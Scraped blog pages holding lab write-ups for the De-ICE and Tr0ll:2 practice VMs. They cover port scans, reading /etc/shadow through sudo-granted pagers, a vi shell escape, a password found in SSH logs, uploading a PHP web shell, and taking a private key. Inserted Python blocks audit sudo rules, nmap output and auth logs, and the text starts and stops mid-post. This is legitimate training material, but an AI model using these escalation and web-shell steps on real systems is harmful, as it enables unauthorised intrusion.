Jan 2008 23:48:57 +0000<br />To: pirrip@slax.example.net<br />Subject: havisham<br />User-Agent: nail 11.25 7/29/05<br />MIME-Version: 1.0<br />Content-Type: text/plain; charset=us-ascii<br />Content-Transfer-Encoding: 7bit<br /><br />I set her up with an accountus servers. I set her password to "<b>changeme</b>" and will swing by tomorrow and make sure she changes her pw.</blockquote>
Let's try to log in as <b>havisham</b> using this password. Hmmm, it does not work... but wait a minute.<br />
<blockquote class="tr_bq">
From: noreply@fermion.herot.net<br />Message-Id: <200801132354.m0DNshjD011722@slax.example.net><br />Date: Sun, 13 Jan 2008 23:54:42 +0000<br />To: pirrip@slax.example.net<br />Subject: Fermion Account Login Reminder<br />User-Agent: nail 11.25 7/29/05<br />MIME-Version: 1.0<br />Content-Type: text/plain; charset=us-ascii<br />Content-Transfer-Encoding: 7bit<br /><br />Fermion Account Login Reminder<br /><br />Listed below are your Fermion Account login credentials. Please let us know if you have any questions or problems.<br /><br />Regards,<br />Fermion Support<br /><br /><br />E-Mail: pirrip@slax.example.net<br />Password: 0l1v3rTw1st</blockquote>
Wow, now we know our own password! So let's check what we can do as root.<br />
<blockquote class="tr_bq">
pirrip@slax:/var/mail$ sudo -l<br />User pirrip may run the following commands on this host:<br /> (root) /usr/bin/more<br /> (root) /usr/bin/tail<br /> (root) /usr/bin/vi<br /> (root) /usr/bin/cat ALL</blockquote>
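Every binary in that <b>sudo -l</b> list can either read any file or drop to a shell when run as root, which is the whole privilege escalation in this post. As an added example (mine, not from the write-up), here is a triage pass over exactly that output: it parses the rule lines and checks each granted program against a small table of escape-capable binaries. The table is my own short list, not an exhaustive one.<br />

```python
# Added example: parse "sudo -l" output and flag root grants on programs that
# can read arbitrary files or spawn a shell. The input is the output shown in
# the post; the table of programs is a short, hand-written list.
import re

SUDO_L_OUTPUT = """\
User pirrip may run the following commands on this host:
    (root) /usr/bin/more
    (root) /usr/bin/tail
    (root) /usr/bin/vi
    (root) /usr/bin/cat ALL
"""

# program name -> what a root grant on it hands over
ESCAPE_CAPABLE = {
    "vi": "shell via :! or :shell",
    "vim": "shell via :! or :shell",
    "more": "shell via !command from the pager",
    "less": "shell via !command from the pager",
    "cat": "read of any file, including /etc/shadow",
    "tail": "read of any file, including /etc/shadow",
    "head": "read of any file, including /etc/shadow",
}

RULE_RE = re.compile(
    r"^\s*\((?P<runas>[^)]+)\)\s+(?P<nopasswd>NOPASSWD:\s*)?(?P<cmd>\S+)(?P<args>.*)$"
)


def parse_sudo_l(text):
    """Return one dict per '(runas) command [args]' line; other lines are skipped."""
    rules = []
    for line in text.splitlines():
        m = RULE_RE.match(line)
        if m:
            rules.append(
                {
                    "runas": m.group("runas"),
                    "nopasswd": bool(m.group("nopasswd")),
                    "cmd": m.group("cmd"),
                    "args": m.group("args").strip(),
                }
            )
    return rules


def audit_rules(rules):
    """Return finding strings for rules that grant an escape-capable program as root."""
    findings = []
    for r in rules:
        prog = r["cmd"].rsplit("/", 1)[-1]
        if r["runas"].lower() in ("root", "all") and prog in ESCAPE_CAPABLE:
            note = ESCAPE_CAPABLE[prog]
            if r["nopasswd"]:
                note += " (no password required)"
            findings.append("%s as %s: %s" % (r["cmd"], r["runas"], note))
    return findings


if __name__ == "__main__":
    for f in audit_rules(parse_sudo_l(SUDO_L_OUTPUT)):
        print(f)
```

Fixing the rules means granting a wrapper script that does the one job needed rather than a general-purpose pager or editor; where a pager is unavoidable, sudo's <b>NOEXEC</b> tag stops it from executing child programs on systems where that tag is supported.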
Excellent! I used the more command on /etc/shadow.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiuNaJzH-68QmxOozSX8XDStsILpoSKnEQxtxccFToVPtkHPPjXXUFY2oJTeNX8MFk0iMVftPR4x4T_oJqj0v9LdtIW3ibE7pPaFGhMUWEqwlF90PE2iMeuGDhP6rXP5bmfpOhwEYBf6ag/s1600/more.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiuNaJzH-68QmxOozSX8XDStsILpoSKnEQxtxccFToVPtkHPPjXXUFY2oJTeNX8MFk0iMVftPR4x4T_oJqj0v9LdtIW3ibE7pPaFGhMUWEqwlF90PE2iMeuGDhP6rXP5bmfpOhwEYBf6ag/s1600/more.png" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />So, we are able to use John the Ripper. Unfortunately it takes a lot of time... We know that <b>vi</b> can run another command via <b>!command</b>.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjeGLUiKDATqmoJqKX_4dxZ3qsx9Rzv6sF-1LwiZMZxxe6zlmR0sMXN1NOwLFbHJwNTrQg3i9-oJNlrRYloDhjhrKLds7n1SPYyhUH2XT2jl4xmv6zenaiyx-ByNed5n5j9M6IfFc__bxo/s1600/shadow.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="483" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjeGLUiKDATqmoJqKX_4dxZ3qsx9Rzv6sF-1LwiZMZxxe6zlmR0sMXN1NOwLFbHJwNTrQg3i9-oJNlrRYloDhjhrKLds7n1SPYyhUH2XT2jl4xmv6zenaiyx-ByNed5n5j9M6IfFc__bxo/s640/shadow.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Game over!<br />
<br />
<b>De-ICE: S1.140</b> (rgolebiowski, published 2016-07-15)<br />
Hello,<br />
De-ICE are penetration-testing LiveCD images available from http://forum.heorot.net; they provide scenarios where students can test their penetration testing skills and tools in a legal environment.<br />
<br />
Scanning all ports in aggressive mode.<br />
<blockquote class="tr_bq">
<br />
PORT STATE SERVICE VERSION<br />
<b>21/tcp open ftp ProFTPD 1.3.4a</b><br />
| ftp-anon: Anonymous FTP login allowed (FTP code 230)<br />
|_Can't get directory listing: ERROR<br />
<b>22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.1 (Ubuntu Linux; protocol 2.0)</b><br />
| ssh-hostkey: <br />
| 1024 38:82:58:d3:9c:0d:28:01:f0:77:11:0a:24:c7:28:84 (DSA)<br />
| 2048 62:a6:24:6a:62:71:b6:5f:7f:67:2f:c2:fd:0a:2a:5e (RSA)<br />
|_ 256 2b:1d:91:ac:6b:2e:7a:fe:6e:aa:0d:55:cc:30:7c:de (ECDSA)<br />
<b>80/tcp open http Apache httpd 2.2.22 ((Ubuntu) mod_ssl/2.2.22 OpenSSL/1.0.1)</b><br />
|_http-server-header: Apache/2.2.22 (Ubuntu) mod_ssl/2.2.22 OpenSSL/1.0.1<br />
|_http-title: Lazy Admin Corp.<br />
<b>443/tcp open ssl/http Apache httpd 2.2.22 ((Ubuntu) mod_ssl/2.2.22 OpenSSL/1.0.1)</b><br />
|_http-server-header: Apache/2.2.22 (Ubuntu) mod_ssl/2.2.22 OpenSSL/1.0.1<br />
|_http-title: Lazy Admin Corp.<br />
| ssl-cert: Subject: commonName=webhost<br />
| Not valid before: 2016-07-13T09:13:52<br />
|_Not valid after: 2026-07-11T09:13:52<br />
|_ssl-date: 2016-07-13T09:17:17+00:00; -1s from scanner time.<br />
<b>465/tcp closed smtps<br />993/tcp open ssl/imap Dovecot imapd</b><br />
|_imap-capabilities: LOGIN-REFERRALS ENABLE AUTH=PLAIN Pre-login have ID IMAP4rev1 listed more capabilities post-login IDLE AUTH=LOGINA0001 OK SASL-IR LITERAL+<br />
|_ssl-date: 2016-07-13T09:17:17+00:00; -1s from scanner time.<br />
<b>995/tcp open ssl/pop3 Dovecot pop3d</b><br />
|_pop3-capabilities: SASL(PLAIN LOGIN) RESP-CODES PIPELINING CAPA TOP UIDL USER<br />
|_ssl-date: 2016-07-13T09:17:17+00:00; -1s from scanner time.</blockquote>
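Both this scan and the two De-Ice 2.100 scans earlier carry findings in the script lines beneath the port entries (anonymous FTP, SSHv1 still offered, HTTP TRACE enabled) that are easy to skim past. As an added example (mine, not from the write-ups), here is a parser for this nmap text format with a triage pass that surfaces those conditions; the excerpt it runs on is copied from the scans in these posts with the bold markup removed.<br />

```python
# Added example: parse nmap -sV/-sC style text and flag weak service
# configurations. The excerpt is taken from the scans in these posts.
import re

SCAN_EXCERPT = """\
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.4
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
22/tcp open ssh OpenSSH 4.3 (protocol 1.99)
|_sshv1: Server supports SSHv1
80/tcp open http Apache httpd 2.0.55 ((Unix) PHP/5.1.2)
| http-methods:
|_ Potentially risky methods: TRACE
443/tcp closed https
"""

PORT_RE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)\s*(?P<version>.*)$"
)


def parse_nmap(text):
    """Return one dict per port line, with the script lines under it attached."""
    ports = []
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            entry = m.groupdict()
            entry["scripts"] = []
            ports.append(entry)
        elif line.startswith("|") and ports:
            # Script output belongs to the most recent port entry.
            ports[-1]["scripts"].append(line.lstrip("|_ ").strip())
    return ports


def triage(ports):
    """Return (port, finding) tuples for open ports with weak configurations."""
    findings = []
    for p in ports:
        if p["state"] != "open":
            continue
        tag = "%s/%s" % (p["port"], p["proto"])
        blob = " ".join(p["scripts"])
        if "Anonymous FTP login allowed" in blob:
            findings.append((tag, "anonymous FTP enabled"))
        if "Server supports SSHv1" in blob:
            findings.append((tag, "SSH protocol 1 offered"))
        if "Potentially risky methods" in blob and "TRACE" in blob:
            findings.append((tag, "HTTP TRACE enabled"))
        if p["service"] in ("ftp", "telnet", "pop3", "imap"):
            findings.append((tag, "cleartext protocol %s" % p["service"]))
    return findings


if __name__ == "__main__":
    for tag, finding in triage(parse_nmap(SCAN_EXCERPT)):
        print(tag, finding)
```

On the S1.140 host the same pass would be quiet for 993 and 995 (Dovecot behind TLS) and flag only the anonymous ProFTPD login; running it over every scan keeps the write-up's "let's start from FTP, because it allows anonymous" decision from depending on a reader noticing one line.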
Let's start with FTP, because it allows an anonymous user. There is an <b>incoming</b> directory, which is empty.<br />
Browsing the web application, we can see the default web page.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXrQxvQLOiHwxCQOEI0obYtC38WdDS315yJKJHjqhSMkAK9yfa-3uGwzyXQ-oTfPy3z5i-0orETj5Eb4IZoJjlk8BYuSO1xKavW2WpegqMX3FAgauH-lf1aIHZTuwvyczOuKtiNojMzqg/s1600/admin.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="322" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXrQxvQLOiHwxCQOEI0obYtC38WdDS315yJKJHjqhSMkAK9yfa-3uGwzyXQ-oTfPy3z5i-0orETj5Eb4IZoJjlk8BYuSO1xKavW2WpegqMX3FAgauH-lf1aIHZTuwvyczOuKtiNojMzqg/s640/admin.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
OK, we won't display the source code, because it contains hints. Let's run DirBuster.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFnaSCg68Lr-VxVB2PtF6QB4F8VrikATQBvORAiEUz6Guly1uU3F20pvur5H8SXdrrw_LSi2wIobeOum794_DUkGqaIG9dHcyZ-b0zYCtWWOia97dzBYJuaPMVjk5kVRUszq2KQZ59_8o/s1600/dirbuster.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFnaSCg68Lr-VxVB2PtF6QB4F8VrikATQBvORAiEUz6Guly1uU3F20pvur5H8SXdrrw_LSi2wIobeOum794_DUkGqaIG9dHcyZ-b0zYCtWWOia97dzBYJuaPMVjk5kVRUszq2KQZ59_8o/s1600/dirbuster.png" /></a></div>
<br />
The forum looks interesting. Let's take a deeper look.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNIOxigVpAEi7HqbtUz8gH7hNHL5i16bcJ6wJFqHMe0KYZvLYQyXpFSyJK2fGF-vNSy_wzzuHTgDdht4H6v2-V_S0XV75PO1Y47Mnrwx9R7OvoBEReNK1Gvn9W7mdD7KEBs2udJp5PYco/s1600/forum.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNIOxigVpAEi7HqbtUz8gH7hNHL5i16bcJ6wJFqHMe0KYZvLYQyXpFSyJK2fGF-vNSy_wzzuHTgDdht4H6v2-V_S0XV75PO1Y47Mnrwx9R7OvoBEReNK1Gvn9W7mdD7KEBs2udJp5PYco/s1600/forum.png" /></a></div>
<br />
Excellent! Hmmm, what do you think about <b>Login Attacks</b>? Is it interesting to you? Because for me it is.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEigBDkjo2yji5mercE6EB7rIKZbpZylnGmQT2FFQH81lrip2ZxbLqxgE0PtgpH8-wW4ipxpj0X3wHo3_S5UiAo9kZOBLGtASi4hUC3UFpzkWm0PJGld6_Zfh2x9Z7zmPHf7hAIOWb2OFZs/s1600/ssh.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEigBDkjo2yji5mercE6EB7rIKZbpZylnGmQT2FFQH81lrip2ZxbLqxgE0PtgpH8-wW4ipxpj0X3wHo3_S5UiAo9kZOBLGtASi4hUC3UFpzkWm0PJGld6_Zfh2x9Z7zmPHf7hAIOWb2OFZs/s1600/ssh.png" /></a></div>
<br />
OK, we have to understand what was going on. We can see that someone was trying to enumerate usernames and/or brute-force SSH. Hey, look at this<br />
<blockquote class="tr_bq">
Mar 7 11:15:32 testbox sshd[5774]: Accepted keyboard-interactive/pam for <b>mbrown</b> from 10.0.0.23 port 35168 ssh2<br />
Mar 7 11:15:32 testbox sshd[5774]: pam_unix(sshd:session): session opened for user mbrown by (uid=0)</blockquote>
but unfortunately SSH in this case does not allow password authentication.<br />
I have also found<br />
<blockquote class="tr_bq">
Mar 7 11:15:32 testbox sshd[5772]: Invalid user <b>!DFiuoTkbxtdk0!</b> from 10.0.0.23<br />
Mar 7 11:15:32 testbox sshd[5772]: input_userauth_request: invalid user <b>!DFiuoTkbxtdk0!</b> [preauth]</blockquote>
This looks like a password. BINGO! I have logged in as <b>mbrown</b> using that password.<br />
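The two log excerpts above show the defender's side of this finding: sshd writes the rejected username verbatim, so a password typed into the login field is leaked into a world-readable log next to the attacker's source address. The added Python below (mine, not the post's) parses such lines, counts guesses per source, flags "usernames" that cannot be real account names, and pairs a later success with the source that was guessing; the sample log is constructed from the quoted entries plus one invented "admin" attempt.

```python
import re
from collections import Counter, defaultdict

# Constructed sample log, modelled on the sshd entries quoted in the post
# (the "admin" lines are invented to show an ordinary guess next to the leak).
SAMPLE_AUTH_LOG = """\
Mar 7 11:15:31 testbox sshd[5770]: Invalid user admin from 10.0.0.23
Mar 7 11:15:31 testbox sshd[5770]: input_userauth_request: invalid user admin [preauth]
Mar 7 11:15:32 testbox sshd[5772]: Invalid user !DFiuoTkbxtdk0! from 10.0.0.23
Mar 7 11:15:32 testbox sshd[5772]: input_userauth_request: invalid user !DFiuoTkbxtdk0! [preauth]
Mar 7 11:15:32 testbox sshd[5774]: Accepted keyboard-interactive/pam for mbrown from 10.0.0.23 port 35168 ssh2
Mar 7 11:15:32 testbox sshd[5774]: pam_unix(sshd:session): session opened for user mbrown by (uid=0)
"""

# "Invalid user X from IP": X is logged verbatim, so a mistyped password lands in
# the log. The non-greedy group keeps usernames that contain spaces intact.
INVALID_RE = re.compile(r"sshd\[\d+\]: Invalid user (?P<user>.*?) from (?P<ip>\S+)\s*$")
ACCEPTED_RE = re.compile(r"sshd\[\d+\]: Accepted (?P<method>\S+) for (?P<user>\S+) from (?P<ip>\S+)")
# Assumed local account-naming policy: portable POSIX-style names only.
USERNAME_RE = re.compile(r"^[a-z_][a-z0-9_-]*\$?$")


def triage(log_text):
    """Summarise failed and successful logins per source address and flag
    rejected usernames that look like leaked secrets rather than account names."""
    invalid_by_ip = defaultdict(Counter)
    accepted = []
    for line in log_text.splitlines():
        m = INVALID_RE.search(line)
        if m:
            invalid_by_ip[m["ip"]][m["user"]] += 1
            continue
        m = ACCEPTED_RE.search(line)
        if m:
            accepted.append((m["ip"], m["user"], m["method"]))
    # Anything that is not a plausible account name is probably a password or
    # token typed into the wrong field; the log line itself now needs protecting.
    leaked = sorted({u for c in invalid_by_ip.values() for u in c if not USERNAME_RE.match(u)})
    # A success from a source that was guessing just before deserves a closer look.
    success_after_failures = [(ip, u, m) for ip, u, m in accepted if ip in invalid_by_ip]
    return {
        "invalid_by_ip": {ip: dict(c) for ip, c in invalid_by_ip.items()},
        "leaked_secret_candidates": leaked,
        "success_after_failures": success_after_failures,
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_AUTH_LOG).items():
        print(f"{key}: {value}")
```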
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxZuq3d56SnblXw45zkPlwqvhgr-Ovkb00EJRbfRhaGtgVI3ZhpVYa2XnEec9btyuinKqYM-e10Uig3UbMRxJFGQli3sJTQFonEqSk_eFMiA-grTsOteKFEnt6eDoRS96xfRxrpTpoWeo/s1600/user.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="634" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxZuq3d56SnblXw45zkPlwqvhgr-Ovkb00EJRbfRhaGtgVI3ZhpVYa2XnEec9btyuinKqYM-e10Uig3UbMRxJFGQli3sJTQFonEqSk_eFMiA-grTsOteKFEnt6eDoRS96xfRxrpTpoWeo/s640/user.png" width="640" /></a></div>
<br />
Very good! I was looking for a way to upload some kind of backdoor, but without success.<br />
I remember that DirBuster also found the <b>/webmail/</b> directory, so let's try to log in as mbrown.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQ0m_seDtphGEaNJNRdTcg5s1Sl2hCC3Djm4CL3WlVt3DbXnJoOeui18X1KNlpcpBhy0JAfYNp4YJS08LMbNYKpioQk6cG3h8g1BVvJuiRE4f81Ugxd2LLcQbXwgNrI2wgp4ProbbnVQM/s1600/webmail.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQ0m_seDtphGEaNJNRdTcg5s1Sl2hCC3Djm4CL3WlVt3DbXnJoOeui18X1KNlpcpBhy0JAfYNp4YJS08LMbNYKpioQk6cG3h8g1BVvJuiRE4f81Ugxd2LLcQbXwgNrI2wgp4ProbbnVQM/s1600/webmail.png" /></a></div>
<br />
BINGO! We are in. I have opened one of the two mails and it contains the following very juicy information.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiuULoZI7UHJf2m_57VJdV99nf3X48EJ1Ujt3s-Rh0z8gZ5_vK3i4E6rzIDEEsGJ6ABZ9y8NFU4MTaaseK_71eiCWeEjeAiI_a2nBnCLDoLZ6L7JBy1S8e9jz_tZXFRJhR-nJonPyvF8pY/s1600/mail.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiuULoZI7UHJf2m_57VJdV99nf3X48EJ1Ujt3s-Rh0z8gZ5_vK3i4E6rzIDEEsGJ6ABZ9y8NFU4MTaaseK_71eiCWeEjeAiI_a2nBnCLDoLZ6L7JBy1S8e9jz_tZXFRJhR-nJonPyvF8pY/s1600/mail.png" /></a></div>
<br />
Wow! So nice! Now we are able to log in as <b>root</b> to the <b>phpmyadmin</b> panel.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYHJSW3dd3v86OiiLSqr7Llx_TnWN3UDAfNec8ZoRauv0x3HLj891SmtPUApOv1MdYxL-Om34Q0RuRElRslI4vvyvXa0gqTW2UE_WXZMrl3tnVtJzbZth2YXwMU9PoFltwAXPYiyxzeNc/s1600/phpmyadmin.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYHJSW3dd3v86OiiLSqr7Llx_TnWN3UDAfNec8ZoRauv0x3HLj891SmtPUApOv1MdYxL-Om34Q0RuRElRslI4vvyvXa0gqTW2UE_WXZMrl3tnVtJzbZth2YXwMU9PoFltwAXPYiyxzeNc/s1600/phpmyadmin.png" /></a></div>
<br />
Nice! I searched for a long time for a place where I could upload our PHP script, and I found that the <b>/templates_c/</b> directory is writable.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-dmQ87ZYie4zFaV8Kgby41ccD_UtkejzXUhQm9kOYtTWJk9_DA1hz1PjgWPEfnay16etctTRS-erxXM7GNhKIERKATJuh3HHcCJ8g8gdja4Y0-bSiy3uSiPJMXlqivfrw9D7l3P2vwx4/s1600/shell.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-dmQ87ZYie4zFaV8Kgby41ccD_UtkejzXUhQm9kOYtTWJk9_DA1hz1PjgWPEfnay16etctTRS-erxXM7GNhKIERKATJuh3HHcCJ8g8gdja4Y0-bSiy3uSiPJMXlqivfrw9D7l3P2vwx4/s1600/shell.png" /></a></div>
<br />
Excellent! So, let's execute it.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnAOwxkKEb_3e1nIuEN0jlwNBs-vLFiLsLpTYhErs8v89f4ah6LNYU7CjqjbobLS2m_MX3pNE8xUJM5JgFfvqAqAk2HRJsjGSX50vOuPfBTmaHBmvvh3vndRPw1P6-kinQfwY21DDe8mw/s1600/id.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnAOwxkKEb_3e1nIuEN0jlwNBs-vLFiLsLpTYhErs8v89f4ah6LNYU7CjqjbobLS2m_MX3pNE8xUJM5JgFfvqAqAk2HRJsjGSX50vOuPfBTmaHBmvvh3vndRPw1P6-kinQfwY21DDe8mw/s1600/id.png" /></a></div>
<br />
Awesome, we have got a limited shell via the web browser. But we can also obtain a limited console shell using a certain script.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJdAF41uBIY-U0JCoDmVGho2nqNmVmsDVXoFzfnxOfu_-3shoYGhjVx8c2BeO2ekcpoOSfouNBGo5XZGy2cljvpDhNUkdkAXkrGUT6ols_t8B7vH_H5mK48OJaDjay3UJMPEqc_tLu8co/s1600/shell.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJdAF41uBIY-U0JCoDmVGho2nqNmVmsDVXoFzfnxOfu_-3shoYGhjVx8c2BeO2ekcpoOSfouNBGo5XZGy2cljvpDhNUkdkAXkrGUT6ols_t8B7vH_H5mK48OJaDjay3UJMPEqc_tLu8co/s1600/shell.png" /></a></div>
<br />
Great! So, maybe we can log in as some user using the known password. BINGO! We have achieved it! So let's try to find something useful.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBxIDJ4kDN9EOzC9q62LgMg87Y6SpUUVMGJdirgUpL9S9VLaWCk7l7ffS5BaBnO6IwDgcXgEf3hLZ7qeQdqrUpd4TLWW0AMOt8Djib-sIyKAl_a-LHrOY8JTHivU09NV8dD31gcCf4T1w/s1600/pk.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBxIDJ4kDN9EOzC9q62LgMg87Y6SpUUVMGJdirgUpL9S9VLaWCk7l7ffS5BaBnO6IwDgcXgEf3hLZ7qeQdqrUpd4TLWW0AMOt8Djib-sIyKAl_a-LHrOY8JTHivU09NV8dD31gcCf4T1w/s1600/pk.png" /></a></div>
<br />
Yeah! Let's download the key to our attacker machine and try to log in to SSH via key authentication.<br />
Unfortunately without success... Hmmm, I am a little bit confused.<br />
So let's look at the <b>/home</b> directory.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLepgrYEuOYD4EF3VZ8gT0-Q8zKteMAor1BlekO8qoarFVDA5FlLgUBEAPEJK2049rMWI6RA1DYbi3gIEwVDlEBkNVoMvNchZ1Q-b-qEWFlyqq0yRlXQee8R4sbryWREXGBYq0hgHN4qM/s1600/ftp.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLepgrYEuOYD4EF3VZ8gT0-Q8zKteMAor1BlekO8qoarFVDA5FlLgUBEAPEJK2049rMWI6RA1DYbi3gIEwVDlEBkNVoMvNchZ1Q-b-qEWFlyqq0yRlXQee8R4sbryWREXGBYq0hgHN4qM/s1600/ftp.png" /></a></div>
<br />
I was trying to decrypt the file, but we need to know the password. I have found the <b>/opt/backup.sh</b> file - it may be interesting!<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg89xYDJ2hsp5wK5UVO2irFoxKfBZ-hzmkRUQ-Sr9Hr_jH1OSK1KAo_dAKVEiPMaA0UeWG4I1CRQ-g2nQkC6PM1soH8SAYGZY8DsQaoUd7R1e-s4mjs3rxeAmo3lfcUJ7KHyCAGwjCtF1A/s1600/back.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="220" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg89xYDJ2hsp5wK5UVO2irFoxKfBZ-hzmkRUQ-Sr9Hr_jH1OSK1KAo_dAKVEiPMaA0UeWG4I1CRQ-g2nQkC6PM1soH8SAYGZY8DsQaoUd7R1e-s4mjs3rxeAmo3lfcUJ7KHyCAGwjCtF1A/s640/back.png" width="640" /></a></div>
<br />
We cannot execute it, but we can see that there is a password for our encrypted file!<br />
<br />
TBU<br />
<br />
<br />rgolebiowskihttp://www.blogger.com/profile/06575754454762912759noreply@blogger.comtag:blogger.com,1999:blog-3159890562902717913.post-64089204428713537692016-07-12T13:27:00.000+02:002016-07-22T21:01:23.276+02:00Tr0ll:2Hello,<br />
The next machine in the Tr0ll series of VMs. This one is a step up in difficulty from the original Tr0ll but the time required to solve is approximately the same, and make no mistake, trolls are still present! :) Difficulty is beginner++ to intermediate.<br />
<br />
Scanning<br />
<blockquote class="tr_bq">
PORT STATE SERVICE VERSION<br />
21/tcp open ftp vsftpd 2.0.8 or later<br />
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.4 (Ubuntu Linux; protocol 2.0)<br />
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))</blockquote>
Let's begin with the FTP service<br />
<blockquote class="tr_bq">
Connected to 192.168.56.101.<br />
220 Welcome to Tr0ll FTP... Only noobs stay for a while...<br />
Name (192.168.56.101:root): anonymous<br />
331 Please specify the password.<br />
Password:<br />
530 Login incorrect.<br />
Login failed.</blockquote>
Uh, we cannot log in as the anonymous user.<br />
Let's browse the web application<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhvXBwo58gtF-8YVjyl9VI51lkcELZETzwkKPT3m1ENu2VUgHT64m6UY34cyUTqn3odEZQ7S2kr5SFB523t8FBbBTfjFk4jxj3JzqHPIyEWfS6fiPbD9jigFNhyphenhyphenzvFSlh5SViDLYjoxRno/s1600/tr0l.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="397" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhvXBwo58gtF-8YVjyl9VI51lkcELZETzwkKPT3m1ENu2VUgHT64m6UY34cyUTqn3odEZQ7S2kr5SFB523t8FBbBTfjFk4jxj3JzqHPIyEWfS6fiPbD9jigFNhyphenhyphenzvFSlh5SViDLYjoxRno/s400/tr0l.png" width="400" /></a></div>
<br />
